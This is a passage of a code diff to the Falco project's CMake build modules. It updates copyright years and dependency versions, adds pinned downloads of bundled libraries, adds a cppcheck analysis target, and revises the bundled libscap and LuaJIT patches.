 set(CPACK_RPM_POST_INSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/postinstall")
 set(CPACK_RPM_PRE_UNINSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/preuninstall")
 set(CPACK_RPM_POST_UNINSTALL_SCRIPT_FILE "${CMAKE_BINARY_DIR}/scripts/rpm/postuninstall")
--- a/cmake/modules/Coverage.cmake
+++ b/cmake/modules/Coverage.cmake
@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
--- a/cmake/modules/DownloadCatch.cmake
+++ b/cmake/modules/DownloadCatch.cmake
@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
@@ -14,8 +14,8 @@ include(ExternalProject)

 set(CATCH2_INCLUDE ${CMAKE_BINARY_DIR}/catch2-prefix/include)

-set(CATCH_EXTERNAL_URL URL https://github.com/catchorg/catch2/archive/v2.9.1.tar.gz URL_HASH
-                       SHA256=0b36488aca6265e7be14da2c2d0c748b4ddb9c70a1ea4da75736699c629f14ac)
+set(CATCH_EXTERNAL_URL URL https://github.com/catchorg/catch2/archive/v2.12.1.tar.gz URL_HASH
+                       SHA256=e5635c082282ea518a8dd7ee89796c8026af8ea9068cd7402fb1615deacd91c3)

 ExternalProject_Add(
  catch2
--- a/cmake/modules/DownloadFakeIt.cmake
+++ b/cmake/modules/DownloadFakeIt.cmake
@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
--- a/cmake/modules/DownloadStringViewLite.cmake
+++ b/cmake/modules/DownloadStringViewLite.cmake
@@ -0,0 +1,29 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+include(ExternalProject)
+
+set(STRING_VIEW_LITE_PREFIX ${CMAKE_BINARY_DIR}/string-view-lite-prefix)
+set(STRING_VIEW_LITE_INCLUDE ${STRING_VIEW_LITE_PREFIX}/include)
+message(STATUS "Using bundled string-view-lite in ${STRING_VIEW_LITE_INCLUDE}")
+
+ExternalProject_Add(
+  string-view-lite
+  PREFIX ${STRING_VIEW_LITE_PREFIX}
+  GIT_REPOSITORY "https://github.com/martinmoene/string-view-lite.git"
+  GIT_TAG "v1.4.0"
+  CONFIGURE_COMMAND ""
+  BUILD_COMMAND ""
+  INSTALL_COMMAND
+    ${CMAKE_COMMAND} -E copy ${STRING_VIEW_LITE_PREFIX}/src/string-view-lite/include/nonstd/string_view.hpp
+    ${STRING_VIEW_LITE_INCLUDE}/nonstd/string_view.hpp)
--- a/cmake/modules/FindMakedev.cmake
+++ b/cmake/modules/FindMakedev.cmake
@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
--- a/cmake/modules/GetFalcoVersion.cmake
+++ b/cmake/modules/GetFalcoVersion.cmake
@@ -1,3 +1,16 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
 # Retrieve git ref and commit hash
 include(GetGitRevisionDescription)

--- a/cmake/modules/OpenSSL.cmake
+++ b/cmake/modules/OpenSSL.cmake
@@ -1,3 +1,16 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+mark_as_advanced(OPENSSL_BINARY)
 if(NOT USE_BUNDLED_DEPS)
  find_package(OpenSSL REQUIRED)
  message(STATUS "Found openssl: include: ${OPENSSL_INCLUDE_DIR}, lib: ${OPENSSL_LIBRARIES}")
@@ -8,6 +21,8 @@ if(NOT USE_BUNDLED_DEPS)
    message(STATUS "Found openssl: binary: ${OPENSSL_BINARY}")
  endif()
 else()
+  mark_as_advanced(OPENSSL_BUNDLE_DIR OPENSSL_INSTALL_DIR OPENSSL_INCLUDE_DIR
+    OPENSSL_LIBRARY_SSL OPENSSL_LIBRARY_CRYPTO)
  set(OPENSSL_BUNDLE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl")
  set(OPENSSL_INSTALL_DIR "${OPENSSL_BUNDLE_DIR}/target")
  set(OPENSSL_INCLUDE_DIR "${PROJECT_BINARY_DIR}/openssl-prefix/src/openssl/include")
@@ -20,10 +35,10 @@ else()
  ExternalProject_Add(
    openssl
    # START CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
-    URL "https://s3.amazonaws.com/download.draios.com/dependencies/openssl-1.0.2n.tar.gz"
-    URL_HASH "SHA256=370babb75f278c39e0c50e8c4e7493bc0f18db6867478341a832a982fd15a8fe"
+    URL "https://github.com/openssl/openssl/archive/OpenSSL_1_0_2n.tar.gz"
+    URL_HASH "SHA256=4f4bc907caff1fee6ff8593729e5729891adcee412049153a3bb4db7625e8364"
    # END CHANGE for CVE-2017-3735, CVE-2017-3731, CVE-2017-3737, CVE-2017-3738, CVE-2017-3736
-    CONFIGURE_COMMAND ./config shared --prefix=${OPENSSL_INSTALL_DIR}
+    CONFIGURE_COMMAND ./config no-shared --prefix=${OPENSSL_INSTALL_DIR}
    BUILD_COMMAND ${CMD_MAKE}
    BUILD_IN_SOURCE 1
    INSTALL_COMMAND ${CMD_MAKE} install)
--- a/cmake/modules/b64.cmake
+++ b/cmake/modules/b64.cmake
@@ -0,0 +1,27 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+set(B64_SRC "${PROJECT_BINARY_DIR}/b64-prefix/src/b64")
+message(STATUS "Using bundled b64 in '${B64_SRC}'")
+set(B64_INCLUDE "${B64_SRC}/include")
+set(B64_LIB "${B64_SRC}/src/libb64.a")
+externalproject_add(
+  b64
+  URL "https://github.com/libb64/libb64/archive/ce864b17ea0e24a91e77c7dd3eb2d1ac4175b3f0.tar.gz"
+  URL_HASH "SHA256=d07173e66f435e5c77dbf81bd9313f8d0e4a3b4edd4105a62f4f8132ba932811"
+  CONFIGURE_COMMAND ""
+  BUILD_COMMAND ${CMD_MAKE}
+  BUILD_IN_SOURCE 1
+  BUILD_BYPRODUCTS ${B64_LIB}
+  INSTALL_COMMAND ""
+)
--- a/cmake/modules/cURL.cmake
+++ b/cmake/modules/cURL.cmake
@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
@@ -19,19 +19,15 @@ else()
  set(CURL_INCLUDE_DIR "${CURL_BUNDLE_DIR}/include/")
  set(CURL_LIBRARIES "${CURL_BUNDLE_DIR}/lib/.libs/libcurl.a")

-  if(NOT USE_BUNDLED_OPENSSL)
-    set(CURL_SSL_OPTION "--with-ssl")
-  else()
-    set(CURL_SSL_OPTION "--with-ssl=${OPENSSL_INSTALL_DIR}")
-    message(STATUS "Using bundled curl in '${CURL_BUNDLE_DIR}'")
-    message(STATUS "Using SSL for curl in '${CURL_SSL_OPTION}'")
-  endif()
+  set(CURL_SSL_OPTION "--with-ssl=${OPENSSL_INSTALL_DIR}")
+  message(STATUS "Using bundled curl in '${CURL_BUNDLE_DIR}'")
+  message(STATUS "Using SSL for curl in '${CURL_SSL_OPTION}'")

  externalproject_add(
    curl
    DEPENDS openssl
    # START CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
-    URL "https://s3.amazonaws.com/download.draios.com/dependencies/curl-7.61.0.tar.bz2"
+    URL "https://github.com/curl/curl/releases/download/curl-7_61_0/curl-7.61.0.tar.bz2"
    URL_HASH "SHA256=5f6f336921cf5b84de56afbd08dfb70adeef2303751ffb3e570c936c6d656c9c"
    # END CHANGE for CVE-2017-8816, CVE-2017-8817, CVE-2017-8818, CVE-2018-1000007
    CONFIGURE_COMMAND
--- a/cmake/modules/gRPC.cmake
+++ b/cmake/modules/gRPC.cmake
@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
@@ -22,6 +22,7 @@ if(NOT USE_BUNDLED_DEPS)
  endif()

  # c-ares
+  mark_as_advanced(CARES_INCLUDE CARES_LIB)
  find_path(CARES_INCLUDE NAMES ares.h)
  find_library(CARES_LIB NAMES libcares.so)
  if(CARES_INCLUDE AND CARES_LIB)
@@ -31,6 +32,7 @@ if(NOT USE_BUNDLED_DEPS)
  endif()

  # protobuf
+  mark_as_advanced(PROTOC PROTOBUF_INCLUDE PROTOBUF_LIB)
  find_program(PROTOC NAMES protoc)
  find_path(PROTOBUF_INCLUDE NAMES google/protobuf/message.h)
  find_library(PROTOBUF_LIB NAMES libprotobuf.so)
@@ -42,13 +44,27 @@ if(NOT USE_BUNDLED_DEPS)
    message(FATAL_ERROR "Couldn't find system protobuf")
  endif()

+  # gpr
+  mark_as_advanced(GPR_LIB)
+  find_library(GPR_LIB NAMES gpr)
+
+  if(GPR_LIB)
+    message(STATUS "Found gpr lib: ${GPR_LIB}")
+  else()
+    message(FATAL_ERROR "Couldn't find system gpr")
+  endif()
+
  # gRPC todo(fntlnz, leodido): check that gRPC version is greater or equal than 1.8.0
+  mark_as_advanced(GRPC_INCLUDE GRPC_SRC
+    GRPC_LIB GRPC_LIBS_ABSOLUTE  GRPCPP_LIB GRPC_CPP_PLUGIN)
  find_path(GRPCXX_INCLUDE NAMES grpc++/grpc++.h)
  if(GRPCXX_INCLUDE)
    set(GRPC_INCLUDE ${GRPCXX_INCLUDE})
+    unset(GRPCXX_INCLUDE CACHE)
  else()
    find_path(GRPCPP_INCLUDE NAMES grpcpp/grpcpp.h)
    set(GRPC_INCLUDE ${GRPCPP_INCLUDE})
+    unset(GRPCPP_INCLUDE CACHE)
    add_definitions(-DGRPC_INCLUDE_IS_GRPCPP=1)
  endif()
  find_library(GRPC_LIB NAMES grpc)
@@ -87,12 +103,17 @@ else()
  # that zlib will be very outdated
  set(ZLIB_INCLUDE "${GRPC_SRC}/third_party/zlib")
  set(ZLIB_LIB "${GRPC_LIBS_ABSOLUTE}/libz.a")
+  # we tell gRPC to compile c-ares for us because when a gRPC package is not available, like on CentOS, it's very likely
+  # that c-ares will be very outdated
+  set(CARES_INCLUDE "${GRPC_SRC}/third_party/cares" "${GRPC_SRC}/third_party/cares/cares")
+  set(CARES_LIB "${GRPC_LIBS_ABSOLUTE}/libares.a")

  message(STATUS "Using bundled gRPC in '${GRPC_SRC}'")
  message(
    STATUS
      "Bundled gRPC comes with protobuf: compiler: ${PROTOC}, include: ${PROTOBUF_INCLUDE}, lib: ${PROTOBUF_LIB}")
  message(STATUS "Bundled gRPC comes with zlib: include: ${ZLIB_INCLUDE}, lib: ${ZLIB_LIB}}")
+  message(STATUS "Bundled gRPC comes with cares: include: ${CARES_INCLUDE}, lib: ${CARES_LIB}}")
  message(STATUS "Bundled gRPC comes with gRPC C++ plugin: include: ${GRPC_CPP_PLUGIN}")

  get_filename_component(PROTOC_DIR ${PROTOC} PATH)
@@ -101,8 +122,8 @@ else()
    grpc
    DEPENDS openssl
    GIT_REPOSITORY https://github.com/grpc/grpc.git
-    GIT_TAG v1.25.0
-    GIT_SUBMODULES "third_party/protobuf third_party/zlib third_party/cares/cares"
+    GIT_TAG v1.32.0
+    GIT_SUBMODULES "third_party/protobuf third_party/zlib third_party/cares/cares third_party/abseil-cpp third_party/re2"
    BUILD_IN_SOURCE 1
    BUILD_BYPRODUCTS ${GRPC_LIB} ${GRPCPP_LIB}
    INSTALL_COMMAND ""
@@ -112,6 +133,8 @@ else()
      HAS_SYSTEM_ZLIB=false
      HAS_SYSTEM_PROTOBUF=false
      HAS_SYSTEM_CARES=false
+      HAS_EMBEDDED_OPENSSL_ALPN=false
+      HAS_SYSTEM_OPENSSL_ALPN=true
      PKG_CONFIG_PATH=${OPENSSL_BUNDLE_DIR}
      PKG_CONFIG=${PKG_CONFIG_EXECUTABLE}
      PATH=${PROTOC_DIR}:$ENV{PATH}
--- a/cmake/modules/jq.cmake
+++ b/cmake/modules/jq.cmake
@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
@@ -10,26 +10,45 @@
 # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
 # specific language governing permissions and limitations under the License.
 #
-if(NOT USE_BUNDLED_DEPS)
-  find_path(JQ_INCLUDE jq.h PATH_SUFFIXES jq)
-  find_library(JQ_LIB NAMES jq)
-  if(JQ_INCLUDE AND JQ_LIB)
-    message(STATUS "Found jq: include: ${JQ_INCLUDE}, lib: ${JQ_LIB}")
-  else()
-    message(FATAL_ERROR "Couldn't find system jq")
-  endif()
-else()
-  set(JQ_SRC "${PROJECT_BINARY_DIR}/jq-prefix/src/jq")
-  message(STATUS "Using bundled jq in '${JQ_SRC}'")
-  set(JQ_INCLUDE "${JQ_SRC}")
-  set(JQ_LIB "${JQ_SRC}/.libs/libjq.a")
-  ExternalProject_Add(
-    jq
-    URL "https://github.com/stedolan/jq/releases/download/jq-1.5/jq-1.5.tar.gz"
-    URL_HASH "SHA256=c4d2bfec6436341113419debf479d833692cc5cdab7eb0326b5a4d4fbe9f493c"
-    CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking
-    BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
-    BUILD_IN_SOURCE 1
-    PATCH_COMMAND curl -L https://github.com/stedolan/jq/commit/8eb1367ca44e772963e704a700ef72ae2e12babd.patch | patch
-    INSTALL_COMMAND "")
-endif()
+mark_as_advanced(JQ_INCLUDE JQ_LIB)
+if (NOT USE_BUNDLED_DEPS)
+    find_path(JQ_INCLUDE jq.h PATH_SUFFIXES jq)
+    find_library(JQ_LIB NAMES jq)
+    if (JQ_INCLUDE AND JQ_LIB)
+        message(STATUS "Found jq: include: ${JQ_INCLUDE}, lib: ${JQ_LIB}")
+    else ()
+        message(FATAL_ERROR "Couldn't find system jq")
+    endif ()
+else ()
+    set(JQ_SRC "${PROJECT_BINARY_DIR}/jq-prefix/src/jq")
+    message(STATUS "Using bundled jq in '${JQ_SRC}'")
+    set(JQ_INCLUDE "${JQ_SRC}/target/include")
+    set(JQ_INSTALL_DIR "${JQ_SRC}/target")
+    set(JQ_LIB "${JQ_INSTALL_DIR}/lib/libjq.a")
+    set(ONIGURUMA_LIB "${JQ_INSTALL_DIR}/lib/libonig.a")
+    message(STATUS "Bundled jq: include: ${JQ_INCLUDE}, lib: ${JQ_LIB}")
+
+    # Why we mirror jq here?
+    #
+    # In their readme, jq claims that you don't have
+    # to do autoreconf -fi when downloading a released tarball.
+    #
+    # However, they forgot to push the released makefiles
+    # into their release tarbal.
+    #
+    # For this reason, we have to mirror their release after
+    # doing the configuration ourselves.
+    #
+    # This is needed because many distros do not ship the right
+    # version of autoreconf, making virtually impossible to build Falco on them.
+    # Read more about it here:
+    #   https://github.com/stedolan/jq/issues/2061#issuecomment-593445920
+    ExternalProject_Add(
+            jq
+            URL "https://dl.bintray.com/falcosecurity/dependencies/jq-1.6.tar.gz"
+            URL_HASH "SHA256=787518068c35e244334cc79b8e56b60dbab352dff175b7f04a94f662b540bfd9"
+            CONFIGURE_COMMAND ./configure --disable-maintainer-mode --enable-all-static --disable-dependency-tracking --with-oniguruma=builtin --prefix=${JQ_INSTALL_DIR}
+            BUILD_COMMAND ${CMD_MAKE} LDFLAGS=-all-static
+            BUILD_IN_SOURCE 1
+            INSTALL_COMMAND ${CMD_MAKE} install)
+endif ()
--- a/cmake/modules/libyaml.cmake
+++ b/cmake/modules/libyaml.cmake
@@ -0,0 +1,27 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+set(LIBYAML_SRC "${PROJECT_BINARY_DIR}/libyaml-prefix/src/libyaml")
+set(LIBYAML_INSTALL_DIR "${LIBYAML_SRC}/target")
+message(STATUS "Using bundled libyaml in '${LIBYAML_SRC}'")
+set(LIBYAML_LIB "${LIBYAML_SRC}/src/.libs/libyaml.a")
+externalproject_add(
+  libyaml
+  URL "https://github.com/yaml/libyaml/releases/download/0.2.5/yaml-0.2.5.tar.gz"
+  URL_HASH "SHA256=c642ae9b75fee120b2d96c712538bd2cf283228d2337df2cf2988e3c02678ef4"
+  CONFIGURE_COMMAND ./configure --prefix=${LIBYAML_INSTALL_DIR} CFLAGS=-fPIC CPPFLAGS=-fPIC --enable-static=true --enable-shared=false
+  BUILD_COMMAND ${CMD_MAKE}
+  BUILD_IN_SOURCE 1
+  BUILD_BYPRODUCTS ${LIBYAML_LIB}
+  INSTALL_COMMAND ${CMD_MAKE} install
+)
--- a/cmake/modules/lpeg.cmake
+++ b/cmake/modules/lpeg.cmake
@@ -0,0 +1,28 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+set(LPEG_SRC "${PROJECT_BINARY_DIR}/lpeg-prefix/src/lpeg")
+set(LPEG_LIB "${PROJECT_BINARY_DIR}/lpeg-prefix/src/lpeg/build/lpeg.a")
+message(STATUS "Using bundled lpeg in '${LPEG_SRC}'")
+set(LPEG_DEPENDENCIES "")
+list(APPEND LPEG_DEPENDENCIES "luajit")
+ExternalProject_Add(
+  lpeg
+  DEPENDS ${LPEG_DEPENDENCIES}
+  URL "http://www.inf.puc-rio.br/~roberto/lpeg/lpeg-1.0.2.tar.gz"
+  URL_HASH "SHA256=48d66576051b6c78388faad09b70493093264588fcd0f258ddaab1cdd4a15ffe"
+  BUILD_COMMAND LUA_INCLUDE=${LUAJIT_INCLUDE} "${PROJECT_SOURCE_DIR}/scripts/build-lpeg.sh" "${LPEG_SRC}/build"
+  BUILD_IN_SOURCE 1
+  BUILD_BYPRODUCTS ${LPEG_LIB}
+  CONFIGURE_COMMAND ""
+  INSTALL_COMMAND "")
--- a/cmake/modules/luajit.cmake
+++ b/cmake/modules/luajit.cmake
@@ -0,0 +1,27 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+set(LUAJIT_SRC "${PROJECT_BINARY_DIR}/luajit-prefix/src/luajit/src")
+message(STATUS "Using bundled LuaJIT in '${LUAJIT_SRC}'")
+set(LUAJIT_INCLUDE "${LUAJIT_SRC}")
+set(LUAJIT_LIB "${LUAJIT_SRC}/libluajit.a")
+externalproject_add(
+  luajit
+  GIT_REPOSITORY "https://github.com/LuaJIT/LuaJIT"
+  GIT_TAG "1d8b747c161db457e032a023ebbff511f5de5ec2"
+  CONFIGURE_COMMAND ""
+  BUILD_COMMAND ${CMD_MAKE}
+  BUILD_IN_SOURCE 1
+  BUILD_BYPRODUCTS ${LUAJIT_LIB}
+  INSTALL_COMMAND ""
+)
--- a/cmake/modules/lyaml.cmake
+++ b/cmake/modules/lyaml.cmake
@@ -0,0 +1,28 @@
+#
+# Copyright (C) 2020 The Falco Authors.
+#
+# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
+# the License. You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an
+# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the
+# specific language governing permissions and limitations under the License.
+#
+
+set(LYAML_SRC "${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/ext/yaml")
+set(LYAML_LIB "${LYAML_SRC}/.libs/yaml.a")
+message(STATUS "Using bundled lyaml in '${LYAML_SRC}'")
+externalproject_add(
+  lyaml
+  DEPENDS luajit libyaml
+  URL "https://github.com/gvvaughan/lyaml/archive/release-v6.0.tar.gz"
+  URL_HASH "SHA256=9d7cf74d776999ff6f758c569d5202ff5da1f303c6f4229d3b41f71cd3a3e7a7"
+  BUILD_COMMAND ${CMD_MAKE}
+  BUILD_IN_SOURCE 1
+  BUILD_BYPRODUCTS ${LYAML_LIB}
+  CONFIGURE_COMMAND ./configure --enable-static CFLAGS=-I${LIBYAML_INSTALL_DIR}/include CPPFLAGS=-I${LIBYAML_INSTALL_DIR}/include LDFLAGS=-L${LIBYAML_INSTALL_DIR}/lib LIBS=-lyaml LUA=${LUAJIT_SRC}/luajit LUA_INCLUDE=-I${LUAJIT_INCLUDE}
+  INSTALL_COMMAND sh -c
+  "cp -R ${PROJECT_BINARY_DIR}/lyaml-prefix/src/lyaml/lib/* ${PROJECT_SOURCE_DIR}/userspace/engine/lua"
+)
--- a/cmake/modules/static-analysis.cmake
+++ b/cmake/modules/static-analysis.cmake
@@ -0,0 +1,43 @@
+# create the reports folder
+file(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/static-analysis-reports)
+file(MAKE_DIRECTORY ${CMAKE_CURRENT_BINARY_DIR}/static-analysis-reports/cppcheck)
+
+# cppcheck
+mark_as_advanced(CPPCHECK CPPCHECK_HTMLREPORT)
+find_program(CPPCHECK cppcheck)
+find_program(CPPCHECK_HTMLREPORT cppcheck-htmlreport)
+
+if(NOT CPPCHECK)
+  message(STATUS "cppcheck command not found, static code analysis using cppcheck will not be available.")
+else()
+  message(STATUS "cppcheck found at: ${CPPCHECK}")
+  # we are aware that cppcheck can be run
+  # along with the software compilation in a single step
+  # using the CMAKE_CXX_CPPCHECK variables.
+  # However, for practical needs we want to keep the
+  # two things separated and have a specific target for it.
+  # Our cppcheck target reads the compilation database produced by CMake
+  set(CMAKE_EXPORT_COMPILE_COMMANDS On)
+  add_custom_target(
+      cppcheck
+      COMMAND ${CPPCHECK}
+      "--enable=all"
+      "--force"
+      "--inconclusive"
+      "--inline-suppr" # allows to specify suppressions directly in source code
+      "--project=${CMAKE_CURRENT_BINARY_DIR}/compile_commands.json" # use the compilation database as source
+      "--quiet"
+      "--xml" # we want to generate a report
+      "--output-file=${CMAKE_CURRENT_BINARY_DIR}/static-analysis-reports/cppcheck/cppcheck.xml" # generate the report under the reports folder in the build folder
+      "-i${CMAKE_CURRENT_BINARY_DIR}"# exclude the build folder
+  )
+endif() # CPPCHECK
+
+if(NOT CPPCHECK_HTMLREPORT)
+  message(STATUS "cppcheck-htmlreport command not found, will not be able to produce html reports for cppcheck results")
+else()
+  message(STATUS "cppcheck-htmlreport found at: ${CPPCHECK_HTMLREPORT}")
+  add_custom_target(
+    cppcheck_htmlreport
+    COMMAND ${CPPCHECK_HTMLREPORT} --title=${CMAKE_PROJECT_NAME} --report-dir=${CMAKE_CURRENT_BINARY_DIR}/static-analysis-reports/cppcheck --file=static-analysis-reports/cppcheck/cppcheck.xml)
+endif() # CPPCHECK_HTMLREPORT
--- a/cmake/modules/sysdig-repo/CMakeLists.txt
+++ b/cmake/modules/sysdig-repo/CMakeLists.txt
@@ -1,5 +1,5 @@
 #
-# Copyright (C) 2019 The Falco Authors.
+# Copyright (C) 2020 The Falco Authors.
 #
 # Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with
 # the License. You may obtain a copy of the License at
@@ -25,4 +25,4 @@ ExternalProject_Add(
  BUILD_COMMAND ""
  INSTALL_COMMAND ""
  TEST_COMMAND ""
-  PATCH_COMMAND patch -p1 -i ${CMAKE_CURRENT_SOURCE_DIR}/patch/libscap.patch)
+  PATCH_COMMAND patch -p1 -i ${CMAKE_CURRENT_SOURCE_DIR}/patch/libscap.patch && patch -p1 -i ${CMAKE_CURRENT_SOURCE_DIR}/patch/luajit.patch)
--- a/cmake/modules/sysdig-repo/patch/libscap.patch
+++ b/cmake/modules/sysdig-repo/patch/libscap.patch
@@ -1,8 +1,8 @@
 diff --git a/userspace/libscap/scap.c b/userspace/libscap/scap.c
-index e9faea51..a1b3b501 100644
+index 6f51588e..5f9ea84e 100644
 --- a/userspace/libscap/scap.c
 +++ b/userspace/libscap/scap.c
-@@ -52,7 +52,7 @@ limitations under the License.
+@@ -55,7 +55,7 @@ limitations under the License.
 //#define NDEBUG
 #include <assert.h>
 
@@ -11,7 +11,16 @@ index e9faea51..a1b3b501 100644
 
 //
 // Probe version string size
-@@ -171,7 +171,7 @@ scap_t* scap_open_live_int(char *error, int32_t *rc,
+@@ -114,7 +114,7 @@ scap_t* scap_open_udig_int(char *error, int32_t *rc,
+ static uint32_t get_max_consumers()
+ {
+ 	uint32_t max;
+-	FILE *pfile = fopen("/sys/module/" PROBE_DEVICE_NAME "_probe/parameters/max_consumers", "r");
+	FILE *pfile = fopen("/sys/module/" PROBE_DEVICE_NAME "/parameters/max_consumers", "r");
+ 	if(pfile != NULL)
+ 	{
+ 		int w = fscanf(pfile, "%"PRIu32, &max);
+@@ -186,7 +186,7 @@ scap_t* scap_open_live_int(char *error, int32_t *rc,
 				return NULL;
 			}
 
@@ -20,7 +29,16 @@ index e9faea51..a1b3b501 100644
 			bpf_probe = buf;
 		}
 	}
-@@ -1808,7 +1808,7 @@ int32_t scap_disable_dynamic_snaplen(scap_t* handle)
+@@ -344,7 +344,7 @@ scap_t* scap_open_live_int(char *error, int32_t *rc,
+ 				else if(errno == EBUSY)
+ 				{
+ 					uint32_t curr_max_consumers = get_max_consumers();
+-					snprintf(error, SCAP_LASTERR_SIZE, "Too many sysdig instances attached to device %s. Current value for /sys/module/" PROBE_DEVICE_NAME "_probe/parameters/max_consumers is '%"PRIu32"'.", filename, curr_max_consumers);
+					snprintf(error, SCAP_LASTERR_SIZE, "Too many Falco instances attached to device %s. Current value for /sys/module/" PROBE_DEVICE_NAME "/parameters/max_consumers is '%"PRIu32"'.", filename, curr_max_consumers);
+ 				}
+ 				else
+ 				{
+@@ -2175,7 +2175,7 @@ int32_t scap_disable_dynamic_snaplen(scap_t* handle)
 
 const char* scap_get_host_root()
 {
--- a/cmake/modules/sysdig-repo/patch/luajit.patch
+++ b/cmake/modules/sysdig-repo/patch/luajit.patch
@@ -0,0 +1,57 @@
+diff --git a/userspace/libsinsp/chisel.cpp b/userspace/libsinsp/chisel.cpp
+index 0a6e3cf8..0c2e255a 100644
+--- a/userspace/libsinsp/chisel.cpp
+++ b/userspace/libsinsp/chisel.cpp
+@@ -98,7 +98,7 @@ void lua_stackdump(lua_State *L)
+ // Lua callbacks
+ ///////////////////////////////////////////////////////////////////////////////
+ #ifdef HAS_LUA_CHISELS
+-const static struct luaL_reg ll_sysdig [] =
+const static struct luaL_Reg ll_sysdig [] =
+ {
